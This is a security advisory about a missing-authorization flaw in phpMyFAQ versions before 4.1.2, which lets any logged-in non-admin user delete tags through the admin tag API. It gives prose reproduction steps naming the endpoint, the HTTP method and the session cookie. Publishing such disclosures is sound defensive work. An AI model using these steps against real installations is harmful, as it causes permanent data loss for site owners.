phpMyFAQ Missing Authorization Vulnerability in Tag Deletion Endpoint

A missing authorization vulnerability has been identified in phpMyFAQ versions prior to 4.1.2. The issue resides in the DELETE /admin/api/content/tags/{tagId} endpoint, where the application fails to properly authorize users before allowing tag deletion. This vulnerability enables any authenticated user, including regular frontend users, to delete arbitrary tags by sending a DELETE request with a valid session cookie. The consequence of this vulnerability is permanent data loss and disruption of FAQ organization, as deleted tags cannot be recovered without a database backup.

Impact

Exploitation of this vulnerability allows any authenticated user to delete tags, leading to permanent data loss and disruption of FAQ organization. In large installations with extensive tag taxonomies, this could significantly degrade usability.

Reproduction

To reproduce this vulnerability, first register as a regular user on the phpMyFAQ frontend or use an existing non-admin authenticated session. Once logged in as a non-admin user, send a DELETE request to the /admin/api/content/tags/{tagId} endpoint, including the PHPSESSID cookie from the authenticated session. The request will be processed successfully, deleting the specified tag, despite the lack of proper authorization.

Remediation

Users are advised to update phpMyFAQ to version 4.1.2 or later, where this vulnerability has been patched.